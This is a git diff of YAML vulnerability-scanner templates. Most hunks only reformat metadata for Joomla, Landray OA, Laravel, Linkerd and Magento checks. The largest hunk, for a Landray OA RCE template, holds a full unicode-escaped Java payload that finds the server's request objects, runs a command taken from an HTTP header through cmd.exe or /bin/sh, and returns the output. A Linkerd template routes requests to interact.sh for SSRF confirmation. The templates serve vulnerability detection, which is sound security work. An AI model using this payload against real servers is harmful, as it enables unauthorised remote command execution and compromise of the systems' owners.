joomla,rce,unauth,php,cms,objectinjection http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -33,6 +32,7 @@ http: host-redirects: true max-redirects: 2 cookie-reuse: true + extractors: - type: regex name: csrf @@ -41,7 +41,6 @@ http: regex: - "' internal: true - matchers: - type: dsl dsl: - - contains(base64_decode(data), "Disallow") \ No newline at end of file + - contains(base64_decode(data), "Disallow") diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml index e136db55ea..65751eb950 100755 --- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml @@ -9,11 +9,10 @@ info: - https://www.modb.pro/db/555240 - https://github.com/mhaskar/XMLDecoder-payload-generator metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Landray-OA系统" tags: landray,rce - variables: payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d' @@ -37,4 +36,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml index 935d1617f4..74dc4ea4b7 100755 --- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml @@ -10,8 +10,8 @@ info: - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Landray-OA系统" tags: landray,oa,treexml,rce @@ -41,4 +41,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/laravel/laravel-ignition-xss.yaml b/http/vulnerabilities/laravel/laravel-ignition-xss.yaml index 874c45b15c..17a088b2c6 100644 --- a/http/vulnerabilities/laravel/laravel-ignition-xss.yaml +++ b/http/vulnerabilities/laravel/laravel-ignition-xss.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: laravel,xss,ignition metadata: max-request: 1 + tags: laravel,xss,ignition http: - method: GET diff --git a/http/vulnerabilities/linkerd/linkerd-ssrf.yaml b/http/vulnerabilities/linkerd/linkerd-ssrf.yaml index 94bce03f38..41ef16fd4e 100644 --- a/http/vulnerabilities/linkerd/linkerd-ssrf.yaml +++ b/http/vulnerabilities/linkerd/linkerd-ssrf.yaml @@ -6,14 +6,15 @@ info: severity: info reference: - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: tech,linkerd,service metadata: max-request: 1 + tags: tech,linkerd,service http: - method: GET path: - "{{BaseURL}}" + headers: l5d-dtab: /svc/* => /$/inet/interact.sh/443 diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml index 5ae4b3837e..bbab7f63bc 100644 --- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -43,4 +43,4 @@ http: - 'contains(body, "website_id")' - 'contains(tolower(header), "application/json")' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/magento/magento-cacheleak.yaml b/http/vulnerabilities/magento/magento-cacheleak.yaml index 87c5065a7e..d5ccc4affe 100644 --- a/http/vulnerabilities/magento/magento-cacheleak.yaml +++ b/http/vulnerabilities/magento/magento-cacheleak.yaml @@ -4,16 +4,14 @@ info: name: Magento Cacheleak author: TechbrunchFR severity: high - description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which - natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring - .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. + description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. reference: - https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ - https://royduineveld.nl/magento-cacheleak-exploit/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"Magento" tags: magento @@ -21,8 +19,8 @@ http: - method: GET path: - '{{BaseURL}}/var/resource_config.json' - # Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site + # Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site matchers-condition: and matchers: - type: status @@ -38,4 +36,4 @@ http: - type: word words: - "application/json" - part: header \ No newline at end of file + part: header diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml index ad4a3abd5f..b0d78a670e 100644 --- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml @@ -4,13 +4,12 @@ info: name: Magento Unprotected development files author: TechbrunchFR severity: high - description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to - Magento, "these tests are not supposed to end up on production servers". + description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers". reference: - https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.component:"Magento" tags: magento @@ -38,4 +37,4 @@ http: - 'contains(body, "")' - 'contains(tolower(header), "application/xml") || contains(tolower(header), "application/octet-stream")' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml b/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml index bd92b41a33..9beae37595 100644 --- a/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml +++ 